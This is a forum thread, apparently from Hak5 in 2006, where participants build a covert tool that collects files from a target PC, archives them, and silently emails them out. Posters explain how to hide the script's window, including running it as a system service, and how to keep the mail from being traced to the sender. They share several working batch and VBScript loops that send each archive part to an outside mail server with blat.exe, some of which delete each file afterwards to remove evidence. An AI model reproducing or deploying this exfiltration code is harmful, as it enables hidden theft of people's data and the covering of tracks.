Guest Posted September 28, 2006 Posted September 28, 2006 I wouldnt use a bat script to do this, as its going to be hard to actually hide the bat scripts window. Any user is going to notice a window pop up and close. Does it have to send all that data at once though? I mean cant you split all the data into very small junks and every 30mins or so send one chunk. Quote
pseudobreed Posted September 28, 2006 Posted September 28, 2006 It almost sounds like a custom rootkit. Nice. srvany is the application that can turns a batch command into a service. Really easy to setup and I use it all the time. You just have to make sure that all registry settings and application info go into the 'All Users' profiles. I could never get Blat to auth with Gmail. Gmail kept spitting an error back to me that I had to login a certain way (I cant remember the exact error off the top of my head). It doesnt accept the auth command that Blat gives off. So, I just signed up with a free smtp host (inbox.com). It works out because if the user fires up ethereal and see where the emails are going it really can not be traced back to me. Im going to look into what it takes to setup a bare bones SMTP server. @Spider If you setup a batch schedule with the at command the batch runs under the system account and therefor runs silently. The user never sees the console window. The same thing works if you use srvany to make a service or you could always call nircmd execcmd. Quote
Darren Kitchen Posted September 28, 2006 Author Posted September 28, 2006 ok so blat doesnt work with gmail smtp out of the box. it doesnt handle ssl correctly. supposedly stunnel can be used to wrap it correctly. im looking for some info on that now. also turns out that EXACTLY what we need has already been written at: http://weblogs.asp.net/nleghari/articles/gmailbackup.aspx *however*, it requires dot net framework 2.0, and it adds an icon to the systray. bummer! could have been perfect. Quote
pseudobreed Posted September 28, 2006 Posted September 28, 2006 Im not 100% sure what you are trying to do, however, you could check out Sourceforge for some inspiration. Maybe you can find what you are looking for and port the code. Quote
SomeoneE1se Posted September 28, 2006 Posted September 28, 2006 somewhere on this forum someone kept saying somthing about renaming the bat to somthing like .cmd or command or somthing thats starts with a C and reminds me of the work command and if you do NO window will come up I remember hearing of this twice but I can't seem to find it anymore Quote
Ebola Eater of Packets Posted September 28, 2006 Posted September 28, 2006 Couldn't you just initialize the window in the bottom pixel of the screen? Quote
Darren Kitchen Posted September 28, 2006 Author Posted September 28, 2006 got it working so that once the right paramaters are met the data retrieval will begin and invisibly run the batch file. that's part 1. ive got the tools and commands to send email attachments via command line. that's part 3. now part 2 is rar'ing the files for delivery. shouldnt be long now. Quote
Darren Kitchen Posted September 28, 2006 Author Posted September 28, 2006 ok i've got everything working now except for one last thing. (i say that now but once the proof of concept is done you know feature creep will set in). anyway, here's the problem and I'm sure it's something that could be done with a simple loop in batch. i'd R the FM but im crashing hard after not sleeping for a few days so i'll be lazy and ask. here's the deal: the hack is done. the goodies have been retreived. then rar'd for size. to keep things simple we're using email with ssl which means attachment size needs to be low. if the goodies are less than 5 MB it's no issue, a single rar file will do the trick. but if we've got say, three 5 mb rar files to email we'll need a loop. Here's what we've got: goodies.r00 goodies.r01 goodies.r02 and we need to do this to each file: blat.exe <filename> -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 I'm absolutely exhausted. I'm going to crash and pick this back up in the morning. If anyone has a potential solution or suggestion let me know. Oh, and thanks for everyones input and help on this project. i wont forget your names when doing the segment this weekend. Quote
cooper Posted September 28, 2006 Posted September 28, 2006 Blat is being run from within a batch script, yes? Doesn't Windows batch script support loops aswell? Quote
boristsr Posted September 28, 2006 Posted September 28, 2006 i think the problem is more, we don't know how many files it will be split into. a possible solution: the windows scripting host provides some rather powerful libraries. is this an acceptable requirement? Quote
cooper Posted September 28, 2006 Posted September 28, 2006 Can't you loop over the output of something like '<my_fileset>.*'? Savages! Maybe you can compile a second script from the first script which has that listing added into it? Quote
SomeoneE1se Posted September 28, 2006 Posted September 28, 2006 This is just a simple batch script it's been a long time but its somthing like IF EXIST pwned.r00 GOTO hak1 ELSE GOTO END :hak1 pwn box more send e-mail 2Â Â (replace with script to send e-mail I have no clue about those commands) IF EXIST pwned.r02 GOTO hak2 ELSE GOTO END :hak2 pwn box more (same) IF EXIST pwned.r03 GOTO hak3 ELSE GOTO end ... more haking code ... :end REM THIS BOX HAS BEEN PWNED BY HAK5.ORG someone should check that (that should be right but i'm tired and batch programming was a long time ago) and finish it up to about r45 (45 for h4k5 I can't help but leave easter eggs in my code even if it's a script kiddie egg) and you may not want to add that last REMark Quote
boristsr Posted September 28, 2006 Posted September 28, 2006 that code is good except you either need to have a huge batch-script just in case, or there is a large chance you could miss some files. it'd be good if we could iterate over a list as suggested above, however my batch script ability isn't very strong, so i have no idea if it's feasible in a batch. Quote
SomeoneE1se Posted September 28, 2006 Posted September 28, 2006 Take a look at fastpush all that is, is just a batch script.... or anyother program.. the idea would be to chose the language to fit the program requirements here we need to pass commands to the windows command line... useing a batch script would be the best/fastest way... if not the simplest or smallest code.... it works thats all we need. and this way theres nothing else trying to hide on the computer... Quote
boristsr Posted September 28, 2006 Posted September 28, 2006 just had a great idea, modified your code a bit and used something i gleaned from a script in the switchblade thread @echo off ::initial variable values SET fileNum=00 SET filename="pwned.r" ::make a string containing the complete filename SET filenameComplete=%filename%%fileNum% ::check to see if the initial file exists, if not, jumps to after the loop IF NOT EXIST %filenameComplete% GOTO noFiles ::the archive loop :processFile ::do what we need with it here ::perform steps in preparation for next file ::increment the file number SET /a fileNum=fileNum+1 ::make the number double digits if %fileNum% LSS 10 set fileNum=0%fileNum% ::make a string containing the complete filename SET filenameComplete=%filename%%fileNum% ::check to see if next file exists and then loop ::else continue on IF EXIST %filenameComplete% GOTO processFile :noFiles ::Continue the script how valid is that? remember, my batch scripting skills suck. **edit** commented it better. have since tested it, it works, except it executes on the first file reguardless, so fixed that too. **edit 2** somewhere in my refinements, i have broken it. will have a working version very soon **edit 3** working again, placed a not on the wrong if statement Quote
PoyBoy Posted September 28, 2006 Posted September 28, 2006 batch scripts really seem to look like a pile of shit on a griddle compared to python... Anyways, I think is really going to work! Quote
404 Posted September 28, 2006 Posted September 28, 2006 I'm really looking forward to how this project will turn out. Maybe a bit late, but here's an interesting C script for keylogging and mailing from Irongeek: http://www.irongeek.com/i.php?page=security/keylogger . Probably not useful for this project anymore, but still interesting. Oh by the way, which C compiler did you use now, Darren? Quote
boristsr Posted September 28, 2006 Posted September 28, 2006 batch scripts really seem to look like a pile of shit on a griddle compared to python...Anyways, I think is really going to work! while i don't disagree, batch scripts do have the advantage of not needing a 10 meg download. Quote
pseudobreed Posted September 28, 2006 Posted September 28, 2006 Copy and paste the code into goodies.vbs Call the VBScript on the command line: cscript /nologo goodies.vbs {filename*} It will blat out all the files that match the filename*. Use * as the wildcard. (ie. cscript /nologo goodies.vbs goodies* - This will send out every file in the folder that matches goodies.*, goodies.rar, goodies.r01, goodies.r02, etc.) Set FSO = CreateObject("Scripting.FileSystemObject") ReDim arrFiles(1) Set Folder = FSO.GetFolder(".") Set Files = Folder.Files For Each File in Files   If CheckFile(File.Name, WSCript.Arguments(0)) Then     If i > UBound(arrFiles) Then Redim Preserve arrFiles(i*2)     arrFiles(i) = File.Path     i = i + 1   End If Next ReDim Preserve arrFiles(i-1) For Each FileName In arrFiles   'WScript.Echo FileName   blat.exe FileName -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 Next Private Function CheckFile (ByVal Name, ByVal Filter)   CheckFile = False   FilterPos = 1   NamePos = 1   Do     If FilterPos > Len(Filter) Then       CheckFile = NamePos > len(Name)       Exit Function     End If     If Mid(Filter,FilterPos) = ".*" Then       If NamePos > Len(Name) Then CheckFile = True       Exit Function     End If     If Mid(Filter,FilterPos) = "." Then       CheckFile = NamePos > Len(Name)       Exit Function     End If     FilterCount = Mid(Filter,FilterPos,1)     FilterPos = FilterPos + 1     Select Case FilterCount       Case "*"         CheckFile = CheckFile2(Name,NamePos,Filter,FilterPos)         Exit Function       Case "?"         If NamePos <= Len(Name) And Mid(Name,NamePos,1) <> "." Then NamePos = NamePos + 1       Case Else         If NamePos > Len(Name) Then Exit Function         NameCount = Mid(Name,NamePos,1)         NamePos = NamePos + 1         If Strcomp(FilterCount,NameCount,vbTextCompare) <> 0 Then Exit Function     End Select   Loop End Function Private Function CheckFile2 (ByVal Name, ByVal NamePos0, ByVal Filter, ByVal FilterPos0)   FilterPos = FilterPos0   Do     If FilterPos > Len(Filter) Then       CheckFile2 = True       Exit Function     End If     FilterCount2 = Mid(Filter,FilterPos,1)     FilterPos = FilterPos + 1            If FilterCount2 <> "*" And FilterCount2 <> "?" Then       Exit Do     End If   Loop   If FilterCount2 = "." Then     If Mid(Filter,FilterPos) = "*" Then       CheckFile2 = True       Exit Function     End If         If FilterPos > Len(Filter) Then       CheckFile2 = InStr(NamePos0,Name,".") = 0       Exit Function     End If   End If   For NamePos = NamePos0 To Len(Name)     NameCount = Mid(Name,NamePos,1)     If StrComp(FilterCount2,NameCount,vbTextCompare)=0 Then       If CheckFile(Mid(Name,NamePos+1),Mid(Filter,FilterPos)) Then         CheckFile2 = True         Exit Function       End If     End If   Next     CheckFile2 = False End Function I didnt comment anything =/, so if you have any questions just ask and Ill explain. Now you just have to fill in the credentials for blat and you should be good to go. *Edit - Added argument option to script. Quote
DLSS Posted September 28, 2006 Posted September 28, 2006 This is just a simple batch scriptit's been a long time but its somthing like IF EXIST pwned.r00 GOTO hak1 ELSE GOTO END :hak1 pwn box more send e-mail 2Â Â (replace with script to send e-mail I have no clue about those commands) IF EXIST pwned.r02 GOTO hak2 ELSE GOTO END :hak2 pwn box more (same) IF EXIST pwned.r03 GOTO hak3 ELSE GOTO end ... more haking code ... :end REM THIS BOX HAS BEEN PWNED BY HAK5.ORG someone should check that (that should be right but i'm tired and batch programming was a long time ago) and finish it up to about r45 (45 for h4k5 I can't help but leave easter eggs in my code even if it's a script kiddie egg) and you may not want to add that last REMark ok so as cooper sayd 2ce u can loop in the batch script so instead of creating a new line each time make the number a variable (r.%part%)and at the end make it add part = part+1 and at ure line wich looks if it exists make it so when it doesn't exit stop. this method reduces (if u'dve gon with 45)a estimated +120 lines to a estimated 11 to 25 line's (depending wot ure still going to add in) this for example shud work ... IF EXIST pwned.r00 GOTO send ELSE GOTO END :hak1 set /a part=%part%+1 IF EXIST pwned.r%part% goto send else goto end :send blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 del pwned.r%part% (delete the evidence after sending) goto hak1 :end exit Quote
SomeoneE1se Posted September 28, 2006 Posted September 28, 2006 Ok so I finshed my code I didn't go to 45 but sending 20 files should be enough and i also preped boristsr code but I have NO idea if it will work @ECHO OFF IF EXIST goodies.r00 GOTO hak0 ELSE GOTO end :hak0 blat.exe goodies.r00 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r01 GOTO hak1 ELSE GOTO end :hak1 blat.exe goodies.r01 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r02 GOTO hak2 ELSE GOTO end :hak2 blat.exe goodies.r02 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r03 GOTO hak3 ELSE GOTO end :hak3 blat.exe goodies.r03 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r04 GOTO hak4 ELSE GOTO end :hak4 blat.exe goodies.r04 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r05 GOTO hak5 ELSE GOTO end :hak5 blat.exe goodies.r05 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r06 GOTO hak6 ELSE GOTO end :hak6 blat.exe goodies.r06 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r07 GOTO hak7 ELSE GOTO end :hak7 blat.exe goodies.r07 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r08 GOTO hak8 ELSE GOTO end :hak8 blat.exe goodies.r08 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r09 GOTO hak9 ELSE GOTO end :hak9 blat.exe goodies.r09 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r10 GOTO hak10 ELSE GOTO end :hak10 blat.exe goodies.r10 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r11 GOTO hak11 ELSE GOTO end :hak11 blat.exe goodies.r11 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r12 GOTO hak12 ELSE GOTO end :hak12 blat.exe goodies.r12 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r13 GOTO hak13 ELSE GOTO end :hak13 blat.exe goodies.r13 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r14 GOTO hak14 ELSE GOTO end :hak14 blat.exe goodies.r14 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r15 GOTO hak15 ELSE GOTO end :hak15 blat.exe goodies.r15 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r16 GOTO hak16 ELSE GOTO end :hak16 blat.exe goodies.r16 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r17 GOTO hak17 ELSE GOTO end :hak17 blat.exe goodies.r17 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r18 GOTO hak18 ELSE GOTO end :hak18 blat.exe goodies.r18 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 IF EXIST goodies.r19 GOTO hakover ELSE GOTO end :hakover blat.exe goodies.r19 -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 :end exit if you expect to have to send more then 20 files let me know and i'll update the code for more files and again I have noidea if this will work @echo off SET rarNum=00 SET rar="goodies.r" SET rarfile=%rar%%rarNum% IF NOT EXIST %rarfile% GOTO end :hakit blat.exe %rarfile% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 ::increment the file number SET /a rarNum=rarNum+1 IF %rarNum% LSS 10 set rarNum=0%fileNum% SET rarfile=%rar%%rarNum% ::check to see if next file exists and then loop ::else continue on IF EXIST %rarfile% GOTO hakit :end exit Quote
PoyBoy Posted September 28, 2006 Posted September 28, 2006 Nice work. I *really* cant wait to see the episode that this is on! Quote
DLSS Posted September 28, 2006 Posted September 28, 2006 arg !!! are you ignoring my last post ? this will work : in less lines : IF EXIST pwned.r00 GOTO send ELSE GOTO END :hak1 set /a part=%part%+1 IF EXIST pwned.r%part% goto send else goto end :send blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 del pwned.r%part% (delete the evidence after sending) goto hak1 :end exit Quote
pseudobreed Posted September 28, 2006 Posted September 28, 2006 arg !!!are you ignoring my last post ? this will work : in less lines : IF EXIST pwned.r00 GOTO send ELSE GOTO END :hak1 set /a part=%part%+1 IF EXIST pwned.r%part% goto send else goto end :send blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 del pwned.r%part% (delete the evidence after sending) goto hak1 :end exit If you do decide to use this, you need to make some changes. WinRar splits files either by adding part# to the filename or creates a new file extention such as .r01, .r02, .r03, etc. depending on how the user wants to split files. Usually it's the latter. In either case it will always have a .rar extension for the first file. So, in your code, you need to send the first .rar file, then go into your loop. Also, while in your loop you need to add a 0 to the file extension if the file number is below 10. Im not sure what happens if you go into three digits, never had to split of a file into that many chunks. Quote
DLSS Posted September 28, 2006 Posted September 28, 2006 arg !!!are you ignoring my last post ? this will work : in less lines : IF EXIST pwned.r00 GOTO send ELSE GOTO END :hak1 set /a part=%part%+1 IF EXIST pwned.r%part% goto send else goto end :send blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 del pwned.r%part% (delete the evidence after sending) goto hak1 :end exit If you do decide to use this, you need to make some changes. WinRar splits files either by adding part# to the filename or creates a new file extention such as .r01, .r02, .r03, etc. depending on how the user wants to split files. Usually it's the latter. In either case it will always have a .rar extension for the first file. So, in your code, you need to send the first .rar file, then go into your loop. Also, while in your loop you need to add a 0 to the file extension if the file number is below 10. Im not sure what happens if you go into three digits, never had to split of a file into that many chunks. thnx 4 the pointers fixed it to work now (but bummer to the amount of line's) IF EXIST pwned.rar GOTO 5end1 IF EXIST pwned.r00 GOTO 5end1 ELSE GOTO END :hak1 set /a part=%part%+1 IF %part% lss 10 goto less10 else goto more10 :less10 IF EXIST pwned.r0%part% goto sendless10 else goto end :more10 IF EXIST pwned.r%part% goto send else goto end :5end1 blat.exe pwned.rar -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 del pwned.rar (delete the evidence after sending) goto hak1 :sendless10 blat.exe pwned.r0%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 del pwned.r%part% (delete the evidence after sending) goto hak1 :send blat.exe pwned.r%part% -base64 -to email@example.com -u username -pw password -server 127.0.0.1:1099 del pwned.r%part% (delete the evidence after sending) goto hak1 :end exit @ this point gmullens las small bit would prolly b better as its les line's of code .... (tho i dont kno the issue's ....) Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.